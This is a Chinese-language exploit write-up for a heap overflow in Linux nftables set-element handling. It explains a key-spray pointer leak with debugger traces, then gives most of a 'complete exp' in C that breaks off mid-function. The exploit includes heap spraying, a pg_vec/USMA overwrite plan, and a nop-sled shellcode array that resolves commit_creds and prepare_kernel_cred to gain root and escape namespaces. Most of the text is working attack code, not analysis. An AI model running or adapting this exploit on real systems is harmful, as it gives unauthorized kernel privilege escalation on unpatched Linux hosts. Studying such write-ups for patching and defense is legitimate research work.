该 CVE 的堆溢出发生在 nftables 过滤器元素添加进入过滤器的过程(这个元素可以是任何一种可以用于过滤网络流量的类型,例如 IP 地址、端口号、协议类型等)

首先使用该堆溢出来覆盖 user_key_payload->datalen 用于泄露数据:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
/*
 * First stage of the proof-of-concept: obtain a kernel pointer.
 *
 * Sprays keys, revokes some of them to open holes, triggers the
 * out-of-bounds write through add_elem_to_set(), then checks whether one of
 * the remaining keys was corrupted. The whole spray is retried until a
 * corrupted key is found. The other keys from FREE_HOLE_BEGIN onwards are
 * then revoked and the corrupted key is read via get_keyring_leak().
 *
 * Stores the result in leak_ptr (declared outside this function).
 * Returns 0 on success, 1 when get_keyring_leak() yields 0.
 */
int do_leak(void) {
key_serial_t id_buffer[SPRAY_KEY_CNT] = {0};
key_serial_t corrupted_key_id = 0;

struct leak_payload leak_payload;
memset(&leak_payload, 0, sizeof(struct leak_payload));
leak_payload.len = CORRUPT_SIZE;

retry:
puts("spraying user_key_payload ...");
spray_keyring(id_buffer, SPRAY_KEY_CNT); /* spray user_key_payload objects */

puts("free some key to create holes ...");
for (int i = FREE_HOLE_BEGIN; i < SPRAY_KEY_CNT; i += FREE_HOLE_STEP) {
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}

puts("trigger oob write ...");
/* Fill one of the holes and attempt the heap overflow. The original note
 * says this reuses a just-freed kmalloc-32 slot.
 * NOTE(review): the spray macros in this file are labelled "spray in
 * kmalloc-64" - confirm which cache is meant. */
add_elem_to_set(netfilter_sock, LEAK_SET_NAME, KMALLOC64_KEYLEN, TABLE_NAME,
ID, sizeof(struct leak_payload), (uint8_t *)&leak_payload);

puts("checking if keyring is corrupted ...");
if (is_keyring_corrupted(id_buffer, SPRAY_KEY_CNT, &corrupted_key_id)) {
/* scan id_buffer for the user_key_payload that was overwritten */
printf("found keyring %d is corrupted!", corrupted_key_id);
} else {
puts("can't found corrupted keyring, retry ...");
key_revokes(id_buffer, SPRAY_KEY_CNT);
goto retry;
}

puts("free other keyring to set rcu.func in user_key_payload ...");
for (int i = FREE_HOLE_BEGIN; i < SPRAY_KEY_CNT; i++) {
if (id_buffer[i] == corrupted_key_id) {
continue;
}
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}

puts("searching rcu.func ...");
leak_ptr = get_keyring_leak(corrupted_key_id); // proc_fs_context_ops
if (!leak_ptr) {
puts("leak rcu.func failed");
/* Leak failed: revoke every key before reporting the error. */
for (int i = 0; i < SPRAY_KEY_CNT; i++) {
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}
return 1;
}

printf("leak user_free_payload_rcu: 0x%08lx\n", leak_ptr);

return 0;
}
  • 通过 user_key_payload 做越界读,就可能读到 rcu.func 中的 user_free_payload_rcu 这个函数指针,从而泄露出内核代码段地址

调试信息如下:

1
2
*RDI  0xffff88800fae9548 ◂— 0x2fb0
*RSI 0xffffc90000607828 ◂— 0x0
1
0xffffffff81b96fdf <nft_set_elem_init+367>    rep movsq qword ptr [rdi], qword ptr [rsi]
1
2
3
4
pwndbg> telescope 0xffff88800fae9548
00:0000│     0xffff88800fae9548 ◂— 0x0
01:0008│ rdi 0xffff88800fae9550 ◂— 0x8000
02:0010│     0xffff88800fae9558 ◂— 'AAAAAAAAA'
1
2
3
4
pwndbg> telescope 0xffffc90000607828
00:0000│     0xffffc90000607828 ◂— 0x0
01:0008│ rsi 0xffffc90000607830 —▸ 0xffffffff81b88000 (nfnetlink_rcv_batch+1456) ◂— mov qword ptr [r15 + 8], rax
02:0010│     0xffffc90000607838 ◂— 0x1
  • user_key_payload->datalen(0xffff88800fae9550) 将会被覆盖为 0x8000
  • PS:这个 0xffffffff81b88000 源自于之前遗留的地址,我们只会使用其最后两字节

然后选择覆盖 ring buffer(pg_vec) 来打 USMA,将 user_free_payload_rcu 函数覆盖为 shellcode 即可(PS:可以使用大量的 nop 来填充 shellcode,增大打通的概率)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <limits.h>
#include <linux/keyctl.h>
#include <sys/wait.h>
#include <arpa/inet.h>
#include <sys/xattr.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <sys/types.h>
#include <sys/shm.h>
#include <sys/ipc.h>
#include <semaphore.h>
#include <sched.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/utsname.h>
#include <sys/syscall.h>
#include <linux/io_uring.h>
#include <linux/netlink.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nfnetlink.h>
#include <linux/netfilter/nf_tables.h>

#include "kernelpwn.h"
/* Identifier and object names used in the nf_tables requests. */
#define ID 1337
#define SET_NAME "nameXXX"
#define LEAK_SET_NAME "leakXXX"
#define TABLE_NAME "tableXX"

/* Each offset is the listed symbol address minus 0xffffffff81000000. */
#define IO_RING_CTX_REF_FREE_OFFSET 0xc4235d // symbol listing: ffffffff81c4235d t io_ring_ctx_ref_free
#define IO_RSRC_NODE_REF_ZERO_OFFSET 0xc42517 // symbol listing: ffffffff81c42517 t io_rsrc_node_ref_zero

// spray in kmalloc-64
#define KEY_DESC_MAX_SIZE 40
#define KEY_PAYLOAD_SIZE (32 + 1 - 24)
#define PREFIX_BUF_LEN (16)
#define RCU_HEAD_LEN (16)
#define SPRAY_KEY_CNT (150)

/* Keys from index FREE_HOLE_BEGIN on are revoked, every FREE_HOLE_STEP-th
 * one first, to open holes in the spray. */
#define FREE_HOLE_BEGIN (100)
#define FREE_HOLE_STEP (10)

/* Value written into leak_payload.len by do_leak(). */
#define CORRUPT_SIZE (0x8000)

#define PHYSMAP_MASK 0xffffffff00000000

/* Key length passed to add_elem_to_set() by do_leak(). */
#define KMALLOC64_KEYLEN (64 - 8 - 12 - 16)

#define PAGE_SIZE 0x1000

/*
 * Packed buffer handed to add_elem_to_set() by do_leak(): PREFIX_BUF_LEN
 * prefix bytes, RCU_HEAD_LEN bytes named after an rcu head, then a 16-bit
 * length that do_leak() sets to CORRUPT_SIZE.
 */
struct leak_payload {
uint8_t prefix[PREFIX_BUF_LEN];
uint8_t rcu_buf[RCU_HEAD_LEN];
uint16_t len;
} __attribute__((packed));

/*
 * Packed buffer consisting of PREFIX_BUF_LEN prefix bytes followed by two
 * pointer-sized slots.
 * NOTE(review): presumably used for the pg_vec overwrite described in the
 * write-up - its users are not visible in this part of the file.
 */
struct write_payload {
uint8_t prefix[PREFIX_BUF_LEN];
char *pg_vec;
char *pg_vec2; // in case shellcode is too long
} __attribute__((packed));

/* Key identifier type; spray_keyring() treats negative values as failure. */
typedef int32_t key_serial_t;

/*
 * Create spray_size keys named "spray_key_<i>" and store their ids.
 *
 * id_buffer:  output array with room for spray_size entries.
 * spray_size: number of keys to create.
 *
 * Each key_alloc() call is attempted up to three times with a 100 ms pause
 * after a failure; if the id is still negative, err_exit("add_key") is
 * called.
 *
 * NOTE(review): key_alloc() is given 0x20 as its third argument while
 * key_payload holds only KEY_PAYLOAD_SIZE + 1 bytes - if that argument is a
 * payload length it reads past the buffer; confirm against key_alloc() in
 * kernelpwn.h.
 */
void spray_keyring(key_serial_t *id_buffer, uint32_t spray_size) {
char key_desc[0x20];
char key_payload[KEY_PAYLOAD_SIZE + 1] = {0};

for (uint32_t i = 0; i < spray_size; i++) {
snprintf(key_desc, sizeof(key_desc), "spray_key_%d", i);
memset(key_payload, 'A', KEY_PAYLOAD_SIZE);
for (int j = 0; j < 3; j++) {
// retry, after KEYCTL_REVOKE, the key is scheduled for garbage collection,
// so it is not freed immediately
id_buffer[i] = key_alloc(key_desc, key_payload, 0x20);
if (id_buffer[i] < 0) {
usleep(100 * 1000); // 100ms
} else {
break;
}
}

if (id_buffer[i] < 0) {
err_exit("add_key");
}
}
}

uint8_t shellcode[] = {
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,

0x48, 0x8d, 0x3d, 0x00, 0x10, 0x00, 0x00, 0xeb, 0x00, 0x55, 0x41, 0x57,
0x41, 0x56, 0x41, 0x54, 0x53, 0x49, 0x89, 0xfc, 0x48, 0x8d, 0x35, 0xfd,
0x01, 0x00, 0x00, 0x6a, 0x0d, 0x5a, 0xe8, 0x85, 0x01, 0x00, 0x00, 0x48,
0x85, 0xc0, 0x0f, 0x84, 0x71, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc3, 0x48,
0x8d, 0x35, 0xef, 0x01, 0x00, 0x00, 0x6a, 0x14, 0x5a, 0x4c, 0x89, 0xe7,
0xe8, 0x67, 0x01, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x53, 0x01,
0x00, 0x00, 0x48, 0x63, 0x2b, 0x48, 0x01, 0xdd, 0x48, 0x63, 0x08, 0x48,
0x01, 0xc1, 0x31, 0xff, 0xff, 0xd1, 0x48, 0x89, 0xc7, 0xff, 0xd5, 0x48,
0x8d, 0x35, 0xd3, 0x01, 0x00, 0x00, 0x6a, 0x0a, 0x5a, 0x4c, 0x89, 0xe7,
0xe8, 0x37, 0x01, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x23, 0x01,
0x00, 0x00, 0x48, 0x89, 0xc3, 0x48, 0x8d, 0x35, 0xbf, 0x01, 0x00, 0x00,
0x6a, 0x09, 0x5a, 0x4c, 0x89, 0xe7, 0xe8, 0x19, 0x01, 0x00, 0x00, 0x48,
0x85, 0xc0, 0x0f, 0x84, 0x05, 0x01, 0x00, 0x00, 0x48, 0x63, 0x0b, 0x48,
0x01, 0xd9, 0x48, 0x63, 0x18, 0x48, 0x01, 0xc3, 0x6a, 0x01, 0x5f, 0xff,
0xd1, 0x48, 0x89, 0xc7, 0x31, 0xf6, 0xff, 0xd3, 0x49, 0x89, 0xc6, 0x48,
0x8d, 0x35, 0x92, 0x01, 0x00, 0x00, 0x6a, 0x0c, 0x5a, 0x4c, 0x89, 0xe7,
0xe8, 0xe3, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xcf, 0x00,
0x00, 0x00, 0x49, 0x89, 0xc7, 0x48, 0x63, 0x18, 0x48, 0x8d, 0x35, 0x7d,
0x01, 0x00, 0x00, 0x6a, 0x0c, 0x5a, 0x4c, 0x89, 0xe7, 0xe8, 0xc2, 0x00,
0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xae, 0x00, 0x00, 0x00, 0x49,
0x01, 0xdf, 0x49, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf0,
0x4c, 0x63, 0x10, 0x49, 0x01, 0xc2, 0x49, 0x8d, 0x8f, 0xa0, 0x00, 0x00,
0x00, 0x4c, 0x89, 0xfa, 0x48, 0x39, 0xca, 0x0f, 0x83, 0x88, 0x00, 0x00,
0x00, 0x48, 0x8b, 0x02, 0x4c, 0x39, 0xc0, 0x73, 0x06, 0x48, 0x83, 0xc2,
0x08, 0xeb, 0xe9, 0x48, 0x8d, 0xb0, 0x00, 0x30, 0x00, 0x00, 0x48, 0x89,
0xc7, 0x48, 0x39, 0xf7, 0x73, 0xeb, 0x48, 0x39, 0x07, 0x48, 0x8d, 0x7f,
0x08, 0x75, 0xf2, 0x48, 0x85, 0xc0, 0x74, 0x5d, 0x6a, 0x01, 0x41, 0x5c,
0x49, 0x89, 0xc3, 0x49, 0x39, 0xf3, 0x73, 0x51, 0x4d, 0x8b, 0x0b, 0x4d,
0x39, 0xc1, 0x72, 0x34, 0x4c, 0x39, 0xc8, 0x74, 0x2f, 0x49, 0x8d, 0x49,
0x60, 0x31, 0xd2, 0x31, 0xdb, 0x4c, 0x89, 0xcf, 0x48, 0x39, 0xcf, 0x73,
0x1f, 0x48, 0x8b, 0x2f, 0x4c, 0x39, 0xfd, 0x41, 0x0f, 0x44, 0xd4, 0x4c,
0x39, 0xd5, 0x41, 0x0f, 0x44, 0xdc, 0x48, 0x83, 0xc7, 0x08, 0x85, 0xdb,
0x74, 0xe2, 0x85, 0xd2, 0x74, 0xde, 0xeb, 0x06, 0x49, 0x83, 0xc3, 0x08,
0xeb, 0xb9, 0x4d, 0x85, 0xc9, 0x74, 0x0a, 0x4c, 0x89, 0xc9, 0x48, 0x29,
0xc1, 0x4d, 0x89, 0x0c, 0x0e, 0x31, 0xc0, 0x5b, 0x41, 0x5c, 0x41, 0x5e,
0x41, 0x5f, 0x5d, 0xc3, 0x53, 0x49, 0x89, 0xd0, 0x49, 0xf7, 0xd8, 0x41,
0xb9, 0x00, 0x00, 0x00, 0x02, 0x31, 0xc0, 0x49, 0x89, 0xfb, 0x4e, 0x8d,
0x14, 0x07, 0x4d, 0x01, 0xca, 0x4d, 0x39, 0xd3, 0x77, 0x50, 0x31, 0xc9,
0x48, 0x39, 0xca, 0x74, 0x13, 0x41, 0x8a, 0x1c, 0x0b, 0x3a, 0x1c, 0x0e,
0x75, 0x05, 0x48, 0xff, 0xc1, 0xeb, 0xed, 0x49, 0xff, 0xc3, 0xeb, 0xe1,
0x4d, 0x85, 0xdb, 0x74, 0x31, 0x49, 0x01, 0xf9, 0x48, 0x83, 0xe7, 0xfc,
0x4c, 0x39, 0xcf, 0x73, 0x13, 0x8b, 0x0f, 0x4c, 0x89, 0xdb, 0x48, 0x29,
0xcb, 0x48, 0x39, 0xfb, 0x74, 0x11, 0x48, 0x83, 0xc7, 0x04, 0xeb, 0xe8,
0x49, 0x01, 0xd3, 0x4d, 0x29, 0xd9, 0x4c, 0x89, 0xdf, 0xeb, 0xab, 0x48,
0x83, 0xc7, 0xfc, 0x48, 0x89, 0xf8, 0x5b, 0xc3, 0x63, 0x6f, 0x6d, 0x6d,
0x69, 0x74, 0x5f, 0x63, 0x72, 0x65, 0x64, 0x73, 0x00, 0x70, 0x72, 0x65,
0x70, 0x61, 0x72, 0x65, 0x5f, 0x6b, 0x65, 0x72, 0x6e, 0x65, 0x6c, 0x5f,
0x63, 0x72, 0x65, 0x64, 0x00, 0x66, 0x69, 0x6e, 0x64, 0x5f, 0x76, 0x70,
0x69, 0x64, 0x00, 0x70, 0x69, 0x64, 0x5f, 0x74, 0x61, 0x73, 0x6b, 0x00,
0x69, 0x6e, 0x69, 0x74, 0x5f, 0x70, 0x69, 0x64, 0x5f, 0x6e, 0x73, 0x00,
0x69, 0x6e, 0x69, 0x74, 0x5f, 0x75, 0x74, 0x73, 0x5f, 0x6e, 0x73, 0x00};

// ---------------------------------- netlink --------------------------------------
// Netlink messages
#define NETLINK_RECEIVE_BUFFER_SIZE 4096

// Netlink attributes
#define U32_NLA_SIZE (sizeof(struct nlattr) + sizeof(uint32_t))
#define U64_NLA_SIZE (sizeof(struct nlattr) + sizeof(uint64_t))
#define S8_NLA_SIZE (sizeof(struct nlattr) + 8)
#define NLA_BIN_SIZE(x) (sizeof(struct nlattr) + x)
#define NLA_ATTR(attr) ((void *)attr + NLA_HDRLEN)
#define TABLEMSG_SIZE NLMSG_SPACE(sizeof(struct nfgenmsg) + S8_NLA_SIZE)

// get_batch_begin_nlmsg(): Construct a BATCH_BEGIN message for the netfilter netlink
// Returns a zero-initialised, heap-allocated message of
// NLMSG_SPACE(sizeof(struct nfgenmsg)) bytes; the caller owns it and must free() it.
// err_exit() is called if the allocation fails.
struct nlmsghdr *get_batch_begin_nlmsg(void) {
    const size_t msg_size = NLMSG_SPACE(sizeof(struct nfgenmsg));
    struct nlmsghdr *nlh = calloc(1, msg_size);
    struct nfgenmsg *nfgm;

    if (!nlh)
        err_exit("malloc");

    nlh->nlmsg_len = msg_size;
    nlh->nlmsg_type = NFNL_MSG_BATCH_BEGIN;
    nlh->nlmsg_pid = getpid();
    nlh->nlmsg_flags = 0;
    nlh->nlmsg_seq = 0;

    // Only derive the payload pointer once the allocation is known to be valid
    nfgm = (struct nfgenmsg *)NLMSG_DATA(nlh);

    // Used to access to the netfilter tables subsystem
    nfgm->res_id = NFNL_SUBSYS_NFTABLES;

    return nlh;
}

// get_batch_end_nlmsg(): Build the BATCH_END message that closes a netfilter netlink batch.
// The returned message is heap-allocated and zero-filled apart from the header
// fields set below; the caller is responsible for free()ing it.
struct nlmsghdr *get_batch_end_nlmsg(void) {
    const size_t total_len = NLMSG_SPACE(sizeof(struct nfgenmsg));
    struct nlmsghdr *end_msg = (struct nlmsghdr *)malloc(total_len);

    if (end_msg == NULL)
        err_exit("malloc");

    memset(end_msg, 0, total_len);

    end_msg->nlmsg_seq = 0;
